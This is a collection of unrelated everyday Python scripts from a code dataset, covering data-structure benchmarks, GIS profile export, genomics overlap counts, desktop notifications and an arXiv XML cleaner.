+{"seq_id":"268820485","text":"\"\"\"Performance comparison of Array, and LinkedLists\nmprof run python main.py\n\"\"\"\nimport timeit\nfrom doubly_linked_list import DoublyLinkedList\n\nll = DoublyLinkedList()\narr = []\n\nfor n in range(100_000):\n ll.insert('eggs')\n arr.append('eggs')\n\ndef ll_insert():\n ll.insert('bacon')\n ll.remove_from_end()\n\ndef array_insert():\n arr.insert(0, 'bacon')\n arr.pop()\n\n\nprint('linked list', timeit.timeit(stmt=ll_insert, number=100_000))\nprint('array', timeit.timeit(stmt=array_insert, number=100_000))\n\n","sub_path":"class-06/demos/linked-list-vs-array/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"590294048","text":"from sympy import *\r\nimport numpy as np\r\n\r\ndef der2(x1,h):\r\n x=Symbol('x')\r\n f=x*(np.e**x)\r\n res=N(f.subs({x:x1+h}))\r\n res2=N(f.subs({x:x1}))\r\n return ((res-res2)/h)\r\n \r\ndef main():\r\n x=Symbol('x')\r\n f=diff(x*(np.e**x),x)\r\n e=f.subs({x:1})\r\n for i in range(1,17):\r\n r=der2(1,1/(10**i))\r\n print(\"|\"+str(e)+\"|\"+str(1/(10**i))+\"|\"+str(r)+\"|\"+str(abs(e-r))+\"|\")\r\n \r\nif __name__ == \"__main__\":\r\n main()","sub_path":"punto5/punto5.py","file_name":"punto5.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"204472391","text":"# --------------------------------------------------------------------------\r\n# Witteveen+Bos\r\n# ing. H.E.J. Nieuwland - januari 2018\r\n# --------------------------------------------------------------------------\r\n# versie 1.0.3\r\n# --------------------------------------------------------------------------\r\n# Surfaceline als CSV exporteren en vakindeling als Shapefile\r\n# Update 9mei2018 - Schrijft uitvoer csv file ook weg aan het vak.\r\n# Update 6juni2018 - Nu is het ook mogelijk om meerdere dwarsprofielen per vak weg te schrijven en shp per vak maar 1 lijnstuk.\r\n# Update 24juli2018 - Werkt vanuit Vakken FC en zoekt niet meer de losse profiel bestanden(SRFVAK_L_* en SRFVAK_P_*) op maar gebruikt het grote totaal bestand.\r\n# --------------------------------------------------------------------------\r\nimport string, os, sys, locale, arcpy\r\n# INPUT\r\nVakFC = sys.argv[1] # Lijnen FC met de vakken\r\nIDkol = \"ID\" # Kolom met id vak\r\nVkol = \"Vaknaam\" # Kolom met naam vak\r\nodir = sys.argv[2] # uitvoer map\r\nKkol = \"SRFpunten\" # Kolom met type punt\r\nPnmKol = \"PROFIELNAAM\" # kolom met profielnaam tbv def query\r\nKol = \"RepresentatiefProfiel\" # Representatief kolom\r\nSkol = \"SORTEERVOLGORDE2\" # kolom met de sorteervolgorde van de punten.\r\nXkol = \"X_WAARDE\"\r\nYkol = \"Y_WAARDE\"\r\nZkol = \"Z_WAARDE\"\r\nBGkol = \"LENGTE_TOT_BG\" # lengte van alle punten tot het beginpunt v/h profiel\r\noCSV_naam = \"Surfacelines.csv\" # de naam van de uitvoer csv\r\nVAK_uitcsv = \"UIT_CSV_Bestand\" # ook aan het vak wegschrijvn waar de csv staat.\r\nPkolVAK = \"REPROF_NAAM\" # kolom aan vakken bestand voor naam representatief profiel.\r\n# databasedir bepalen\r\nworkspace1 = os.path.dirname(arcpy.Describe(VakFC).catalogPath)\r\nif [any(ext) for ext in ('.gdb', '.mdb', '.sde') if ext in os.path.splitext(workspace1)]:\r\n workspace = workspace1\r\nelse:\r\n workspace = os.path.dirname(workspace1) \r\narcpy.env.workspace = workspace\r\n#---\r\narcpy.env.overwriteOutput = True\r\narcpy.AddMessage(\" >>> ----------------------------------\")\r\narcpy.AddWarning(\" >>> Wegschrijven surfacelines en vakindeling\")\r\narcpy.AddMessage(\" >>> ----------------------------------\")\r\n#---------------------------------------------------------\r\n#---------------------------------------------------------\r\n# ---- START\r\n#-------------------------------------------------------\r\n# per vaklijn naam uitlezen, profielnamen selecteren en lijst van maken.\r\nkolommen = [\"OID@\", \"SHAPE@\", IDkol, Vkol, VAK_uitcsv, PkolVAK]\r\n# Aantal vakken uitlezen.\r\ncount = len(list(i for i in arcpy.da.SearchCursor(VakFC, kolommen)))\r\narcpy.AddMessage(\"Aantal vakken: \"+str(count))\r\n#-------------------------\r\nwith arcpy.da.UpdateCursor(VakFC, kolommen,sql_clause=[None,\"ORDER BY \"+IDkol]) as Upcursor:\r\n for Uprow in Upcursor:\r\n FOUT = False # als de benodigde variabelen niet juist zijn dan geen Surfaceline wegschrijven! 
\r\n VakID = Uprow[2]\r\n Vnaam = Uprow[3]\r\n Reprof = Uprow[5]\r\n arcpy.AddMessage(\"\\n--------------------------------\")\r\n arcpy.AddMessage(\"VakID: \"+str(VakID))\r\n arcpy.AddMessage(\"Naam: \"+str(Vnaam))\r\n arcpy.AddMessage(\"Representatief profiel: \"+str(Reprof))\r\n #-- De dwarsprofiel FC\r\n lFC = \"PWK_DWARSPROFIEL_LINE\" #\"SRFVAK_L_\"+VakID\r\n plFC = \"PWK_DWARSPROFIEL_POINT\" #\"SRFVAK_P_\"+VakID\r\n arcpy.AddMessage(\"Surfaceline: \"+lFC)\r\n kolommen = [\"SHAPE@XY\", Kkol]\r\n #---------------------------------------------------------\r\n # Als de FC er niet is dan vak overslaan.\r\n Lchk = arcpy.Exists(lFC)\r\n plchk = arcpy.Exists(plFC)\r\n #---------------------------------------------------------\r\n # Eerst Surfaceline wegschrijven \r\n if Lchk and plchk and FOUT == False and Reprof != None:\r\n kolommen = [\"OID@\", \"SHAPE@\", PnmKol]\r\n were = PnmKol + \" = '\" + Reprof + \"'\"\r\n # uitlezen.\r\n try:\r\n count = len(list(i for i in arcpy.da.SearchCursor(lFC, kolommen, where_clause=were)))\r\n #arcpy.AddMessage(\"Aantal dwarsprofielen: \"+str(count))\r\n except:\r\n #arcpy.AddWarning(\" Nog geen representatief profiel gekozen!\")\r\n FOUT = True\r\n if count == 0:\r\n arcpy.AddWarning(\" is 0!!\")\r\n FOUT = True\r\n elif count > 1:\r\n arcpy.AddWarning(\" is te veel!!\")\r\n FOUT = True \r\n else:\r\n arcpy.AddMessage(\" is ok\")\r\n # Doorgaan als er een profiel is.\r\n if not FOUT:\r\n XYlijst = []\r\n VOORLlst = []\r\n TALUDlst = []\r\n # -------------------------\r\n # Van het dwarsprofiel lijntje hebben we niet meer de RD XYZ\r\n # Dus hier naam van het profiel uit halen en de dwarsprofielpunten seleteren\r\n # we kunnen meerdere dwarsprofielen hebben bij hetzelfde vak. Dus alleen het profiel van het vaklijnstuk verwerken.\r\n # Nu naar de punten\r\n were = PnmKol + \" = '\"+Reprof+\"'\"\r\n XYZlijst = Reprof\r\n Pkolommen = [Xkol, Ykol, Zkol, PnmKol, Skol, BGkol]\r\n with arcpy.da.SearchCursor(plFC, Pkolommen, where_clause=were) as cursor2:\r\n for row2 in cursor2:\r\n X = round(row2[0],4)\r\n Y = round(row2[1],4)\r\n Z = round(row2[2],3)\r\n #arcpy.AddMessage(\"XYZ: \"+str(X)+\"/\"+str(Y)+\"/\"+str(Z))\r\n XYZlijst = XYZlijst+\";\"+str(X)+\";\"+str(Y)+\";\"+str(Z)\r\n # Open csv file\r\n arcpy.AddMessage(\"Wegschrijven naar: \"+ oCSV_naam+\" ...\")\r\n if arcpy.Exists(odir+\"/\"+oCSV_naam):\r\n arcpy.AddMessage(\"Profiel wordt toegevoegd aan uitvoer CSV!\")\r\n ll = open(odir+\"/\"+oCSV_naam, \"a\")\r\n else:\r\n arcpy.AddMessage(\"Aanmaken uitvoer CSV...\")\r\n ll = open(odir+\"/\"+oCSV_naam, \"w\")\r\n ll.write(\"LOCATIONID;X1;Y1;Z1;.....;Xn;Yn;Zn;(Profiel)\\n\")\r\n # Profiel wegschrijven.\r\n ll.write(XYZlijst+\"\\n\")\r\n del row2\r\n #-------------------------------------------------------------------------------\r\n # Open csv file 2 per profiel X_RD;Y_RD;Afstand;Z wegschrijven in een losse file\r\n oCSV2_naam = Reprof+\".csv\"\r\n arcpy.AddMessage(\"Profiel los wegschrijven naar: \"+ oCSV2_naam+\" ...\")\r\n if arcpy.Exists(odir+\"/\"+oCSV2_naam):\r\n arcpy.AddMessage(\"Profiel CSV bestaat al en wordt overschreven!\")\r\n ll2 = open(odir+\"/\"+oCSV2_naam, \"w\")\r\n else:\r\n arcpy.AddMessage(\"Profiel CSV aanmaken...\")\r\n ll2 = open(odir+\"/\"+oCSV2_naam, \"w\")\r\n # Profiel wegschrijven\r\n cursor2.reset()\r\n ll2.write(\"X-RD;Y_RD;Afstand;Z\\n\")\r\n for row3 in cursor2:\r\n X = round(row3[0],4)\r\n Y = round(row3[1],4)\r\n Z = round(row3[2],3)\r\n afst = round(row3[5],2)\r\n #arcpy.AddMessage(\"XYZ: 
\"+str(X)+\"/\"+str(Y)+\"/\"+str(Z)+\"/\"+str(afst))\r\n XYafstZ = str(X)+\";\"+str(Y)+\";\"+str(afst)+\";\"+str(Z)\r\n ll2.write(XYafstZ+\"\\n\")\r\n del row3, cursor2\r\n # naam en locatie uitvoer CSV aan vak koppelen \r\n Uprow[4] = odir+\"/\"+oCSV_naam # naam uitvoer CSV aan het bestand koppelen.\r\n Upcursor.updateRow(Uprow)\r\n#-----------------------------------------------------------------------------------------------\r\n# Als laatste de vakindeling als shape exporteren.\r\n# Hier moeten de dubbele vaklijnen niet in komen te staan dus dubbelingen verwijderen.\r\n# dubbelingen verwijderen\r\narcpy.AddMessage(\"\\n--------------------------------\")\r\narcpy.AddMessage(\"Dubbele vakken niet wegschrijven naar uitvoer shape file.\")\r\n# eerts kopie maken\r\narcpy.CopyFeatures_management(VakFC, \"in_memory/xxVakken\")\r\n# dan unieke vakid lijst maken\r\nIDlijst = []\r\nwith arcpy.da.UpdateCursor(\"in_memory/xxVakken\", [IDkol,Vkol]) as cursor2:\r\n for row2 in cursor2:\r\n arcpy.AddMessage(\"Vaknaam: \"+str(row2[1]))\r\n # als ID nog niet voorkomt dan toevoegen.\r\n lst = set(IDlijst)\r\n if row2[0] not in lst:\r\n IDlijst.append(row2[0])\r\n else:\r\n # record verwijderen\r\n arcpy.AddMessage(\" > vak verwijderen...\")\r\n cursor2.deleteRow()\r\n# en nu wegschrijven \r\narcpy.CopyFeatures_management(in_features=\"in_memory/xxVakken\", out_feature_class=odir+\"/Vakindeling_STPH.shp\")\r\n\r\narcpy.AddMessage(\"\\n >>> KLAAR! <<<\")\r\n","sub_path":"Scripts-rijnenijssel-edwin/scripts_v2/surfacelines_05_schrijf_CSV_SHP_weg.py","file_name":"surfacelines_05_schrijf_CSV_SHP_weg.py","file_ext":"py","file_size_in_byte":9334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"587264130","text":"import argparse\nimport sys\nimport logging\nimport os\nimport gzip\nimport csv\nfrom os import listdir\nfrom os.path import isfile, join\n\nlogger = logging.getLogger('commonEqtl')\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)-8s - %(message)s')\n\nclass GTExOverlapItem:\n def __init__(self, row):\n parts = row.rstrip().split('\\t')\n self.majorAllele = parts[1]\n self.minorAllele = parts[2]\n self.eQTL = parts[0]\n self.Beta = parts[3:]\n self.eQTLCount = len([f for f in self.Beta if f != \"\"])\n self.MajorKey = self.eQTL + \":\" + self.majorAllele + \":\" + self.minorAllele \n self.MinorKey = self.eQTL + \":\" + self.minorAllele + \":\" + self.majorAllele \n \nclass TCGAOverlapItem:\n def __init__(self, row):\n parts = row.rstrip().split('\\t')\n self.majorAllele = parts[1]\n self.minorAllele = parts[2]\n self.eQTL = parts[0]\n self.Beta = parts[3:]\n self.eQTLCount = len([f for f in self.Beta if f != \"\"])\n self.MajorKey = self.eQTL + \":\" + self.majorAllele + \":\" + self.minorAllele \n self.MinorKey = self.eQTL + \":\" + self.minorAllele + \":\" + self.majorAllele\n\ndef findUnique(map1, map2, map3):\n return len([k for k, g in map1.iteritems() if (not g.MajorKey in map2) and (not g.MinorKey in map2) and (not g.MajorKey in map3) and (not g.MinorKey in map3)])\n\ndef findDouble(map1, map2):\n return len([k for k, g in map1.iteritems() if g.MajorKey in map2 or g.MinorKey in map2])\n\ndef findTriple(map1, map2, map3):\n return [k for k, g in map1.iteritems() if ((g.MajorKey in map2) or (g.MinorKey in map2)) and ((g.MajorKey in map3) or (g.MinorKey in map3))]\n\neqtl3OverlapFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_TCGA_rnaTP_snpTP.fdr0.05.tsv\"\neqtl5OverlapFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_TCGA_rnaTP_snpNB.fdr0.05.tsv\"\ngtexOverlapFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_GTEx.tsv\"\n \nlogger.info(\"Reading %s ...\" % eqtl3OverlapFile)\nwith open(eqtl3OverlapFile, \"r\") as f:\n eqtl3Tissues = f.readline().rstrip().split('\\t')[3:]\n eqtl3 = [TCGAOverlapItem(row) for row in f]\n\nlogger.info(\"Reading %s ...\" % eqtl5OverlapFile)\nwith open(eqtl5OverlapFile, \"r\") as f:\n eqtl5Tissues = f.readline().rstrip().split('\\t')[3:]\n eqtl5 = [TCGAOverlapItem(row) for row in f]\n\nlogger.info(\"Reading %s ...\" % gtexOverlapFile)\nwith open(gtexOverlapFile, \"r\") as f:\n gtexTissues = f.readline().rstrip().split('\\t')[3:]\n gtex = [GTExOverlapItem(row) for row in f]\n\ngtexBins = [4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44 ]\ntcgaBins = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n\noutputFile = \"/scratch/cqs/shengq2/guoyan/Table_Tissue_Overlap_GTEx_TCGA_fdr0.05.tsv\"\nwith open(outputFile, \"w\") as f:\n f.write(\"MinGTExTissue\\tMinTCGATissue\\tGTEx\\teQTL3\\teQTL5\\tGTEx_eQTL3\\tGTEx_eQTL5\\teQTL3_eQTL5\\tGTEx_eQTL3_eQTL5\\n\")\n for idx in range(0, len(tcgaBins)):\n gtexMin = gtexBins[idx]\n tcgaMin = tcgaBins[idx]\n \n curGtexMap = {g.MajorKey:g for g in gtex if g.eQTLCount >= gtexMin}\n curEqtl3Map = {g.MajorKey:g for g in eqtl3 if g.eQTLCount >= tcgaMin}\n curEqtl5Map = {g.MajorKey:g for g in eqtl5 if g.eQTLCount >= tcgaMin}\n \n # gtexOnly=findUnique(curGtexMap, curEqtl3Map, curEqtl5Map)\n # eqtl3Only=findUnique(curEqtl3Map, curGtexMap, curEqtl5Map)\n # eqtl5Only=findUnique(curEqtl5Map, curGtexMap, curEqtl3Map)\n \n gtexEqtl3 = findDouble(curGtexMap, curEqtl3Map)\n gtexEqtl5 = findDouble(curGtexMap, curEqtl5Map)\n eqtl3Eqtl5 = findDouble(curEqtl5Map, 
curEqtl3Map)\n \n all = findTriple(curGtexMap, curEqtl3Map, curEqtl5Map)\n f.write(\"%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\t%d\\n\" % (gtexMin, tcgaMin, len(curGtexMap), len(curEqtl3Map), len(curEqtl5Map), gtexEqtl3, gtexEqtl5, eqtl3Eqtl5, len(all)))\n\nwith open(outputFile + \".all_beta.tsv\", \"w\") as f:\n f.write(\"eQTL\\tRefAllele\\tAltAllele\\t%s\\t%s\\t%s\\n\" % \n (\"GTEx_\" + \"\\tGTEx_\".join(gtexTissues),\n \"eTQL3_\" + \"\\teQTL3_\".join(eqtl3Tissues),\n \"eTQL5_\" + \"\\teQTL5_\".join(eqtl5Tissues)))\n keys = sorted(all)\n for key in keys:\n gtexItem = curGtexMap[key]\n if key in curEqtl3Map:\n eqtl3Item = curEqtl3Map[key]\n else:\n eqtl3Item = curEqtl3Map[gtexItem.MinorKey]\n if key in curEqtl5Map:\n eqtl5Item = curEqtl5Map[key]\n else:\n eqtl5Item = curEqtl5Map[gtexItem.MinorKey]\n f.write(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n\" % \n (gtexItem.eQTL,\n gtexItem.majorAllele,\n gtexItem.minorAllele,\n '\\t'.join(gtexItem.Beta),\n '\\t'.join(eqtl3Item.Beta),\n '\\t'.join(eqtl5Item.Beta)))\n\nlogger.info(\"done\")\n","sub_path":"guoyan/20160826_guoyan_tcga_multi_omics/result/commonGTEx_TCGA_Eqtl.py","file_name":"commonGTEx_TCGA_Eqtl.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"371572792","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/3/26 21:49\n# @Author : Ryu\n# @Site : \n# @File : four(计算字符串参数).py\n# @Software: PyCharm\n\ndef my(*diy):\n le = len(diy)\n for i in range(le):\n zimu = 0\n kongge = 0\n shuzi = 0\n qita = 0\n for s in diy[i]:\n if s.isdigit():\n shuzi += 1\n elif s.isalnum():\n zimu += 1\n elif s == \" \":\n kongge +=1\n else:\n qita +=1\n\n print(shuzi,\"个数字\",zimu,\"个字母\",kongge,\"个空格\",qita,\"个其他\")\n\n\ninput(\"请输入字符串\")\nmy(\"dsada212ddada ada \",\"dsad5a1d3a,da\")","sub_path":"venv/Practice/four(计算字符串参数).py","file_name":"four(计算字符串参数).py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"238707940","text":"import os\nimport sys\n\n_packages_dir = os.path.abspath(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'site-packages'))\n\n\ndef add_py_packages(package_names):\n for item in package_names:\n sys.path.append(os.path.join(_packages_dir, item))\n\n_packages = (\n 'markupsafe-0.23-py2.7.egg',\n 'werkzeug-0.11.11-py2.7.egg',\n 'jinja2-2.8-py2.7.egg',\n 'itsdangerous-0.24-py2.7.egg',\n 'click-6.6-py2.7.egg',\n 'docopt-0.6.2-py2.7.egg',\n 'flask-0.11.1-py2.7.egg',\n 'markdown-2.6.6-py2.7.egg',\n 'path_and_address-2.0.1-py2.7.egg',\n 'pygments-2.1.3-py2.7.egg',\n 'requests-2.11.1-py2.7.egg'\n )\n\nadd_py_packages(_packages)\n\n# Disable SSL warnings\nimport requests.packages.urllib3\nrequests.packages.urllib3.disable_warnings()\n\nimport grip.command\n\n\n__author__ = 'hfannar'\n\ngrip.command.main(sys.argv[1:])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"441445939","text":"import sqlite3\n\nwith sqlite3.connect(\"data/formData.db\") as connection:\n c = connection.cursor()\n c.execute(\"\"\"CREATE TABLE postData(name TEXT, message TEXT)\"\"\")\n c.execute('INSERT INTO postData VALUES(\"Admin\", \"Just looking for numbers\")')\n\n c.execute(\"\"\"CREATE TABLE Results(jackpot TEXT, winner TEXT)\"\"\")\n c.execute('INSERT INTO Results VALUES(\"This Weeks Jackpot: €\", \"No Winner\")')\n\n","sub_path":"sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"246817020","text":"#!/usr/bin/env python\n\n# courtesy of http://ubuntuforums.org/showthread.php?t=926797\n\nimport pynotify\nimport os\n\ndef flash_notify(app_name, title, message, icon_filename=\"logo.png\"):\n #initialise pynotify with the app_name\n if not pynotify.init(app_name):\n return False\n\n #create the notification with the icon\n iconURI = os.path.abspath(os.path.join(os.path.dirname(__file__), icon_filename))\n n = pynotify.Notification(title, message, iconURI)\n\n #return True if it displayed, otherwise, False\n return n.show()\n\nif __name__ == '__main__':\n #just a test notification\n if not flash_notify(\"PyNotify Test\", \"Test Title\", \"Test Message\"):\n sys.exit(1)\n","sub_path":"ubuntu_notify.py","file_name":"ubuntu_notify.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"446378627","text":"from selenium import webdriver\nimport logging\n\nlogging_file='example.log'\n\nlogging.basicConfig(filename=logging_file,level=logging.DEBUG)\n\nlogging.debug('begin selenium') #开始记录一个日志\n\ndriver = webdriver.Chrome()\n\nlogging.debug('create chrome')\n\nprint(driver.capabilities['version'])\n\nlogging.debug('print chrome version')","sub_path":"0513练习/logging_test(日志).py","file_name":"logging_test(日志).py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"252494127","text":"\"\"\"\n`texify_*` funcs flatten the argument and returns None. Elements after ``texify`` wouldn't have child nodes.\n`clean_*` funcs may keeps some subelements as the argument's child. Returns None.\n`*_text`s collect and return the text within the argument without doing any change to it. Returns str.\n\"\"\"\n\nimport xml.etree.ElementTree as ET\nimport sys, re\nfrom paths import data_path, results_path, rawxmls_path, cleanlog_path, cleanedxml_path\nfrom os.path import join, basename\nfrom os import listdir\nfrom shutil import copy, copytree\nimport time\n\ndef ignore_ns(root):\n '''\n Clean namespace in the node's tag. Should be called in the first place.\n '''\n for elem in root.iter():\n if not hasattr(elem.tag, 'find'):\n continue\n i = elem.tag.find('}')\n if i >= 0:\n elem.tag = elem.tag[i+1:]\n\ndef opening(elem):\n if elem.text:\n return elem.text\n else:\n return ''\n\ndef inlinepara_text(inpara):\n txt = opening(inpara)\n for elem in inpara:\n if elem.tag == 'para':\n texify_para(elem)\n txt += ' ' + elem.text\n elif elem.tag == 'theorem':\n clean_section(elem)\n txt += ' ' + elem.text\n elif elem.tag == 'float':\n txt += ' ' + float_text(elem)\n return txt\n\ndef p_text(p, dontskip=[]):\n \"\"\"\n Captures all the text within
and its trailing,\n skipping all intermediate tags except , and .\n\n Return the concatenated str.\n \"\"\"\n txt = opening(p) \n for child in p:\n if child.tag in ('p', 'note', 'text', 'emph'):\n txt += ' ' + p_text(child)\n if child.tag == 'inline-para':\n txt += ' ' + inlinepara_text(child)\n elif child.tag in dontskip and child.text: # get text from simple elems in ``dontskip``\n txt += ' ' + child.text\n if child.tail:\n txt += ' ' + child.tail\n if p.tail:\n txt += ' ' + p.tail\n return txt\n\ndef listing_text(lsting):\n txt = opening(lsting)\n for elem in lsting:\n if elem.tag == 'listingline':\n txt += ' ' + p_text(elem)\n if lsting.tail:\n txt += ' ' + lsting.tail\n return txt\n\ndef float_text(flt):\n # results/latexml/=1701.00757.xml\n txt = opening(flt)\n for elem in flt:\n if elem.tag == 'listing':\n txt += ' ' + listing_text(elem)\n elif elem.tag in ('toccaption', 'caption'):\n txt += ' ' + p_text(elem)\n if flt.tail:\n txt += ' ' + flt.tail\n return txt\n\ndef get_ttn(ttelem):\n '''\n Get title str from title element.\n '''\n return p_text(ttelem).strip()\n\ndef texify_para(para):\n '''\n Collects all the
s and extract the text from them.\n Clears all the content in the element, and set the text to ``text``. \n '''\n txt = opening(para)\n for p in para:\n if p.tag in ('p', 'note', 'text', 'personname', 'glossaryphrase') :\n txt += ' ' + p_text(p) \n elif p.tag == 'inline-para':\n txt += ' ' + inlinepara_text(p)\n elif p.tag in ('itemize', 'description'):\n txt += ' ' + descrip_text(p)\n elif p.tag == 'quote':\n txt += ' ' + quote_text(p)\n para.clear() # Change the element tag to 'para': toctitle, titlepage\n para.text = txt\n\ndef item_text(item):\n # Useful: , \n txt = opening(item)\n for elem in item:\n if elem.tag == 'tags': \n for tag in elem:\n for i in tag:\n if i.tag == 'text':\n txt += ' ' + i.text + ':'\n elif elem.tag == 'para':\n texify_para(elem)\n txt += elem.text\n if item.tail:\n txt += ' ' + item.tail\n return txt\n\ndef descrip_text(des): \n # Useful: item\n txt = opening(des)\n for elem in des:\n if elem.tag == 'item': # should be trivial\n txt += ' ' + item_text(elem)\n if elem.tail:\n txt += elem.tail\n if des.tail:\n txt += ' ' + des.tail\n return txt\n\ndef quote_text(quote):\n txt = opening(quote)\n for elem in quote:\n if elem.tag == 'p':\n txt += ' ' + p_text(elem)\n elif elem.tag == 'quote':\n txt += ' ' + quote_text(elem)\n elif elem.tag == 'listing':\n txt += ' ' + listing_text(elem)\n elif elem.tag == 'description':\n txt += ' ' + descrip_text(elem)\n if quote.tail:\n txt += ' ' + quote.tail\n return txt\n\ndef texify(elem, elemtext):\n if elemtext != None:\n elem.clear()\n elem.text = elemtext\n\n\ndef clean_section(secelem):\n # Clear the ``secelem`` and set as `attrib`, s into `text`,\n # keeps subelements like after texifying them.\n\n # Useful: title, para, subsection, subsubsection, theorem, subparagraph, \n # proof, acknowledgements, paragraph, bibliography, note, float\n\n # Ignore: indexmark, figure, bibitem, TOC, tags, toctitle, table, pagination, ERROR\n # txt, titles, subsecs = [], [], []\n secelem.attrib.clear()\n uselesses = []\n for elem in secelem:\n if elem.tag == 'para':\n texify_para(elem)\n elif elem.tag == 'float':\n texify(elem, float_text(elem))\n elif elem.tag == 'title': # in ('title', 'subtitle'):\n secelem.set(elem.tag, get_ttn(elem))\n uselesses.append(elem)\n elif elem.tag in ('subsection', 'subparagraph', 'theorem', 'proof', 'paragraph', 'subsubsection'):\n clean_section(elem)\n elif elem.tag in ('note', 'acknowledgement'): \n texify(elem, p_text(elem))\n elif elem.tag == 'bibliography':\n texify(elem, bib_text)\n else:\n uselesses.append(elem)\n \n for useless in uselesses:\n secelem.remove(useless)\n\ndef clean_chapter(chapelem):\n title = None\n for elem in chapelem:\n if elem.tag == 'para':\n texify_para(elem)\n elif elem.tag == 'toctitle':\n title = p_text(elem)\n elif elem.tag in ('subsection', 'subparagraph', 'section', 'subsubsection'):\n clean_section(elem)\n elem.tag = 'section'\n chapelem.attrib.clear()\n if title:\n chapelem.set('title', title)\n \ndef texify_abstract(ab):\n '''\n Collect the text at the beginning, within subelements and their trailing to ``txt``,\n clear the element,\n and finally, set the text to ``txt``.\n \n Useful children: p, description, quote, inline-para, section, itemize\n '''\n txt = opening(ab)\n for elem in ab:\n if elem.tag == 'p':\n txt += ' ' + p_text(elem)\n elif elem.tag in ('itemize', 'description', 'enumerate'):\n txt += ' ' + descrip_text(elem)\n elif elem.tag == 'inline-para':\n txt += ' ' + inlinepara_text(elem)\n elif elem.tag == 'quote':\n txt += ' ' + quote_text(elem)\n 
ab.clear()\n ab.text = txt # ignore: break, pagination, ERROR, equation, ...\n\ndef clean_titlepage(doc, titlepage):\n '''Extract abstract and move the element to within \n '''\n abstract = titlepage.find('abstract')\n if abstract:\n texify_abstract(abstract)\n titlepage.remove(abstract)\n doc.insert(3,abstract)\n texify_para(titlepage)\n\ndef bib_text(bib):\n txt = ''\n for elem in bib.iter():\n if elem.tag == 'bibblock':\n txt += ' ' + p_text(elem)\n elif elem.tag == 'para':\n texify_para(elem)\n txt += ' ' + elem.text\n bib.clear()\n bib.text = txt\n\ndef clean(root):\n toremove = []\n for child in root:\n if child.tag in ('title', 'subtitle', 'keywords', 'note', 'acknowledgements', 'classification', 'date'):\n # itertext with skipping subelements\n texify(child, p_text(child)) \n elif child.tag == 'abstract':\n texify_abstract(child)\n elif child.tag in ('section', 'paragraph', 'subparagraph', 'subsection', 'appendix', 'theorem', 'proof', 'subsubsection'):\n clean_section(child)\n if child.tag not in ('appendix', 'theorem', 'proof'):\n child.tag = 'section'\n if child.get('title', None) == 'abstract':\n child.tag = 'abstract'\n elif child.tag in ('para', 'creator', 'glossarydefinition'): \n # Collect text with skipping subsubelements\n texify_para(child) \n elif child.tag == 'titlepage':\n clean_titlepage(root, child)\n elif child.tag in ('chapter', 'part'):\n clean_chapter(child)\n child.tag = 'chapter'\n elif child.tag == 'bibliography':\n texify(child, bib_text(child))\n else: # Remove
,
, , , , , , , , \n toremove.append(child)\n for i in toremove:\n root.remove(i)\n \n \ndef postcheck(root, errlog):\n err = False\n errlog.write(xmlpath + ' \\n')\n\n secdict = {'abstract': root.findall('abstract'), 'secs':root.findall('section')}\n for title in secdict:\n elems = secdict[title]\n if len(elems) == 0: # If element not found\n err = True\n # print(title + ' absent: ' + xmlpath)\n errlog.write(title + ' absent. ')\n continue\n \n # If the node exists but is empty\n for elem in elems:\n try:\n txt = ''.join(elem.itertext()) \n except TypeError:\n print([chunk for chunk in elem.itertext()])\n if txt == '':\n err = True\n # print('Empty ' + title + ' :' + xmlpath)\n errlog.write('Empty ' + title + '. ')\n \n if not err:\n errlog.write('OK. ')\n errlog.write('\\n ================================== \\n')\n \ndef get_root(xmlpath):\n tree = ET.parse(xmlpath)\n root = tree.getroot()\n ignore_ns(root)\n return tree, root\n\nif __name__ == \"__main__\":\n # hep-ph0001047.xml\n # tree = ET.parse(join(data_path, 'out.xml'))\n # XXX:subparagraph case: =hep-th0002024.xml\n VERBOSE, REPORT_EVERY = True, 100\n xmls = [fn for fn in listdir(rawxmls_path) if fn[-4:] == '.xml']\n # xmls = ['=hep-ph0002094.xml']\n \n begin = time.time()\n\n with open(cleanlog_path, 'w') as cleanlog:\n for i, xml in enumerate(xmls):\n xmlpath = join(rawxmls_path, xml)\n try:\n tree, root = get_root(xmlpath)\n except ET.ParseError:\n print('Skipped: ParseError at %s' % xmlpath)\n cleanlog.write(xmlpath + ' \\n' + 'ParseError. \\n' + '================================== \\n')\n continue\n clean(root)\n postcheck(root, cleanlog)\n tree.write(join(cleanedxml_path, xml))\n # tree.write(join(results_path, xml))\n\n\n if VERBOSE:\n if (i+1) % REPORT_EVERY == 0 or i+1 == len(xmls):\n print('%s of %s collected.' % (i+1, len(xmls)))\n\n t = time.time() - begin\n t = t/60\n print(len(xmls), 'files in %s mins' % t)\n # 